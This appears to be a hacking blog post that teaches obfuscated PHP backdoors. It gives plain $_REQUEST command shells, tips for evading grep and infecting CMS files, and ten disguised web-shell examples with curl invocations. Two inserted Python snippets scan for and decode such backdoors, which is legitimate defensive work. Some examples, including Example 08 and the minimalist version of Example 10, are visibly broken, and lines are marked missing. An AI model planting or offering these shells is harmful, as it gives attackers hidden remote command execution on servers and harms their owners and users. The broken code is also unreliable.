HOLD THE SHIT — PHP Backdoor for fun
This little post, written for fun, focuses on one of several techniques: thinking outside the box and going beyond the exit() basics used in many backdoor codes.
The post focuses on the superglobals $_GET, $_POST and $_REQUEST.
The most used functions:

shell_exec (PHP 4, PHP 5, PHP 7) - Execute a command via the shell and return the complete output as a string
string shell_exec ( string $cmd )
EXEC-> php -r 'echo shell_exec("ls -la");'

system (PHP 4, PHP 5, PHP 7) - Execute an external program and display the output
string system ( string $command [, int &$return_var ] )
EXEC-> php -r 'system("ls -la");'

exec (PHP 4, PHP 5, PHP 7) - Execute an external program
string exec ( string $command [, array &$output [, int &$return_var ]] )
EXEC-> php -r 'exec("ls -la", $var); print_r($var);'

passthru (PHP 4, PHP 5, PHP 7) - Execute an external program and display the raw output
void passthru ( string $command [, int &$return_var ] )
EXEC-> php -r 'passthru("ls -la", $var);'

Simple implementation:

shell_exec:
if (isset($_REQUEST['cmd'])) { $cmd = shell_exec($_REQUEST['cmd']); print_r($cmd); }

system:
if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }

exec:
if (isset($_REQUEST['cmd'])) { exec($_REQUEST['cmd']); }

passthru:
if (isset($_REQUEST['cmd'])) { passthru($_REQUEST['cmd']); }

We can use the same functions, but in a more elaborate way, so that a simple "grep -E" does not reveal our access.
TIPS:
Use of encoded shell commands in fixed values (constants).
Array is life! Use without moderation.
Concatenation of native functions and definition of variables.
base64_decode / base64_encode(data), bin2hex, error_reporting(0).
Use request parameters (GET or POST) that already exist in the application.
Study the creation of malicious properties in the system's classes, and create their functions.
Manipulating values of the superglobal $_SERVER.
Study infection methods for the files of PHP-based CMSs.
Let's go to the examples.
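From the other side of the table, the simple implementation and the tips above are exactly the patterns a first-pass triage scanner should look for. The following is an added example (not code from the post): a small Python rule set run over constructed PHP snippets modelled on those patterns; the rule names, samples and regexes are all assumptions of this example.

```python
import re

# Constructed PHP snippets modelled on the techniques the post lists (not code from the post).
SAMPLES = {
    "plain_cmd":   "<?php if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }",
    "b64_func":    "<?php (error_reporting(0)).($__=@base64_decode('c3lzdGVt')).$__(base64_decode('aWQ='));",
    "var_func":    "<?php (error_reporting(0)).($_=@$_GET[1]).($_($_GET[2])).exit;",
    "ua_callable": "<?php ($_=@explode(',',$_SERVER['HTTP_USER_AGENT'])).($_[0](\"{$_[1]}\"));",
    "str_incr":    "<?php $_='A';($_++);($_++);($_++);($___[]=$_++);$_____=$___[0];$_____('id');",
    "benign":      "<?php echo htmlspecialchars($_GET['q'] ?? '', ENT_QUOTES);",
}

EXEC_SINKS = r"(?:shell_exec|system|exec|passthru|popen|proc_open)"
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)"

# (rule name, regex). Each rule targets one pattern from the post; keep them narrow
# so the scanner stays useful as a first-pass triage rather than a noise generator.
RULES = [
    ("superglobal_to_exec_sink", rf"\b{EXEC_SINKS}\s*\(\s*{SUPERGLOBAL}\s*\["),
    ("error_reporting_silenced", r"error_reporting\s*\(\s*0\s*\)"),
    ("base64_decoded_literal", r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{4,}['\"]\s*\)"),
    ("variable_function_from_request",
     rf"\$\w+\s*=\s*@?{SUPERGLOBAL}\s*\[[^\]]*\]\s*\)?\s*[.;].*?\$\w+\s*\("),
    ("http_header_value_used", rf"""{SUPERGLOBAL}\s*\[\s*['"]HTTP_[A-Z_]+['"]\s*\]"""),
    ("string_increment_chain", r"(?:\(\s*\$_+\s*\+\+\s*\)\s*[.;]?\s*){3,}"),
    ("create_function_used", r"\bcreate_function\s*\("),
    ("extract_on_request", rf"\bextract\s*\(\s*{SUPERGLOBAL}"),
]

def scan_php(src: str) -> list:
    """Names of the rules that match this PHP source, in RULES order."""
    return [name for name, pat in RULES if re.search(pat, src, re.DOTALL)]

def triage(samples: dict) -> dict:
    """Run scan_php over every labelled sample."""
    return {label: scan_php(src) for label, src in samples.items()}

if __name__ == "__main__":
    for label, hits in triage(SAMPLES).items():
        print(f"{label:12s} -> {', '.join(hits) or 'clean'}")
```

A hit from any single rule is a reason to read the file, not proof of a backdoor; the benign sample shows the rules staying quiet on ordinary request handling.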
EXAMPLE 01
Functions:
Variables: c3lzdGVt = system, dW5hbWUgLWE7bHM7 = uname -a; ls; , aWQ= = id
CODE:
(error_reporting(0)) . ($__ = @base64_decode("c3lzdGVt")) . $__(base64_decode("aWQ="))
. define("_", "dW5hbWUgLWE7bHM7") . $__(base64_decode(_)) . exit;
Execution: curl -v 'http://localhost/shell.php'
EXAMPLE 02
Functions:
Variables: c3lzdGVt = system
CODE:
(error_reporting(0)) . ($__ = @base64_decode("c3lzdGVt"))
. print($__(isset($_REQUEST[0]) ? $_REQUEST[0] : NULL)) . exit;
Execution: curl -v 'http://localhost/shell.php?0=id'
EXAMPLE 03
Functions:
create_function - Creates an anonymous function (lambda-style)
Variables: ZWNobyhzaGVsbF9leGVjKCRfKSk7 = echo(shell_exec($_));
CODE:
(error_reporting(0)) . ($_ = $_REQUEST[0])
. ($__ = @create_function('$_', base64_decode("ZWNobyhzaGVsbF9leGVjKCRfKSk7"))) . ($__($_)) . exit;
Execution: curl -v 'http://localhost/shell.php?0=id'
EXAMPLE 04
Functions:
Variables: $_GET[1] = function name, $_GET[2] = command that will be executed
CODE:
(error_reporting(0)) . ($_ = @$_GET[1]) . ($_($_GET[2])) . exit;
Execution: curl -v 'http://localhost/shell.php?1=system&2=id;uname'
EXAMPLE 05
Functions:
Variables: $_REQUEST[1] = function name, $_REQUEST[2] = command that will be executed
CODE:
(error_reporting(0)) . (extract($_REQUEST, EXTR_PREFIX_ALL))
. ($_ = @get_defined_vars()['_REQUEST']) . (define('_', $_[2])) . ($_[1](_));
Execution: curl -v 'http://localhost/shell.php?1=system&2=id;uname'
EXAMPLE 06
Functions:
Variables: SFRUUF9VU0VSX0FHRU5U = HTTP_USER_AGENT
CODE:
(error_reporting(0)) . ($_ = @explode(',', $_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]))
. ($_[0]("{$_[1]}")) . exit;
Execution: curl -v 'http://localhost/shell.php' --user-agent 'system,id;ls -la'
EXAMPLE 07
Functions:
Variables: \x30 = 0, \x73 = s, \x79 = y, \x73 = s, \x74 = t, \x65 = e, \x6D = m
CODE:
(error_reporting(0)) . ($_[0][] = @$_GET["\x30"])
. ($_[1][] = "\x73") . ($_[1][] = "\x79")
. ($_[1][] = "\x6D") . ($_[1][] = "\x65") . ($___ .= $__[0])
. ($__ = @get_defined_vars()['_'][1])
. ($___ .= $__[1]) . ($___ .= $__[2]) . ($___ .= $__[3])
. ($___ .= $__[4]) . ($___ .= $__[5]) . ($___("{$_[0][0]}")) . exit;
Execution: curl -v 'http://localhost/shell.php?0=id;uname%20-a'
EXAMPLE 08
Functions:
Variables: $_REQUEST[0] = command that will be executed
CODE:
(error_reporting(0)) . (str_replace('$', '@', '#')
, 's$## and @#$@#$@#$@s$#$@#$($_{$_REQUEST[0]}));
Execution: curl -v 'http://localhost/shell.php?0=id'
EXAMPLE 09
Functions:
Variables: $_POST['shellrox'] = command that will be executed
CODE:
(error_reporting(0)) . ($_ = [("\x73\x79" . "\x74\x65\x6d"), "\x73\x68\x65\x6c", "\x6c\x72\x6f\x78"])
. ($_[0]($_POST[$_[1] . $_[2]]));
Execution: curl -d "shellrox=id;uname -a" -X POST 'http://localhost/shell.php'
EXAMPLE 10
Functions:
CODE:
$_ = "";                       # we need a blank string to start
# [code line missing]          # access part of the string to convert it to an array
$_ = $_ . "";                  # convert the array into the string "Array"
# [code line missing]          # access index 0 of the string "Array", which is "A"

# INCREASING THE VALUE TO FIND THE LETTERS, IF YOU WANT TO BUILD THE STRING "system"
($_++); # A
($_++); # B
($_++); # C
($_++); # D
# THE FIRST LETTER FOUND IS PUSHED INTO A SECONDARY ARRAY
($___[] = $_++); # E
($_++); # F
($_++); # G
($_++); # H
($_++); # I
($_++); # J
($_++); # K
($_++); # L
# THE TARGET LETTER IS PUSHED INTO THE SECONDARY ARRAY
($___[] = $_++); # M
($_++); # N
($_++); # O
($_++); # P
($_++); # Q
($_++); # R
# THE TARGET LETTER IS PUSHED INTO THE SECONDARY ARRAY
($___[] = $_++); # S
# THE TARGET LETTER IS PUSHED INTO THE SECONDARY ARRAY
($___[] = $_++); # T
($_++); # U
($_++); # V
($_++); # W
($_++); # X
# THE TARGET LETTER IS PUSHED INTO THE SECONDARY ARRAY
($___[] = $_++); # Y (the counter is now Z)

# ARRAY DEBUG:
/* Array
(
    [0] => E
    [1] => M
    [2] => S
    [3] => T
    [4] => Y
)
*/
# BUILD THE STRING FROM THE FIELDS OF ARRAY $___
$_____ = $___[2] . $___[4] . $___[2] . $___[3] . $___[0] . $___[1];
# USING THE ANONYMOUS (VARIABLE) FUNCTION TECHNIQUE FOR THE CALL
$_____('id; uname -a');

MINIMALIST VERSION:
($_ = $_[+]") . ($_++) . ($_ = $_.
($_++) . ($_++) . ($_++) ($_++) .
($_++) . ($_++) . ($_++) . ($_++) .
($_++) . ($_++) . ($_++) . ($_++) .
($_++) . ($_++) . ($_++) .
($___[] = $_++) . ($_++)
($_____ = $___[2] . $___[4] . $___[2] . $___[3] . $___[0] . $___[1])
($_____('id; uname -a'));
Execution: curl -v 'http://localhost/shell.php'
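Every example above hides its function names and commands behind base64 constants or "\x.." hex escapes, which is also what makes them recoverable during review. The following is an added example (not code from the post): Python helpers that pull such literals out of PHP source, decode them, and flag the ones that spell an execution function; the sample file, function names and the EXEC_NAMES list are assumptions of this example, while the constants it decodes are the ones shown in the examples above.

```python
import base64
import binascii
import re
from typing import Optional

# PHP function names whose appearance as a *decoded* literal deserves a second look.
EXEC_NAMES = {"system", "shell_exec", "exec", "passthru", "popen", "proc_open",
              "eval", "assert", "create_function"}

B64_LITERAL = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/]+={0,2})['"]\s*\)""")
HEX_STRING = re.compile(r'"((?:\\x[0-9A-Fa-f]{2}){2,})"')  # PHP "\x73\x79..." literals

def decode_b64(token: str) -> Optional[str]:
    """Strict base64 decode; None unless the result is printable ASCII text."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def decode_hex_escapes(body: str) -> str:
    """Spell out the characters a hex-escaped PHP string body encodes."""
    return "".join(chr(int(h, 16)) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", body))

def recover_literals(src: str) -> list:
    """(encoded, decoded) pairs for every base64 or hex-escaped literal in src."""
    found = []
    for tok in B64_LITERAL.findall(src):
        dec = decode_b64(tok)
        if dec is not None:
            found.append((tok, dec))
    for lit in HEX_STRING.findall(src):
        found.append((lit, decode_hex_escapes(lit)))
    return found

def suspicious_names(src: str) -> set:
    """Decoded literals that spell an execution-related PHP function name."""
    return {dec for _, dec in recover_literals(src) if dec.lower() in EXEC_NAMES}

# Constructed sample reusing the constants shown in the examples above.
SAMPLE = r'''<?php
($__ = @base64_decode("c3lzdGVt")) . $__(base64_decode("aWQ="));
$_ = @explode(',', $_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);
$f = "\x73\x79\x73\x74\x65\x6d"; $f("id");
'''

if __name__ == "__main__":
    for enc, dec in recover_literals(SAMPLE):
        print(f"{enc!r:34} -> {dec!r}")
    print("suspicious:", suspicious_names(SAMPLE))
```

The string-increment trick of Example 10 leaves no literal to decode, which is why it needs the pattern-based rule earlier in the post rather than this decoder.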
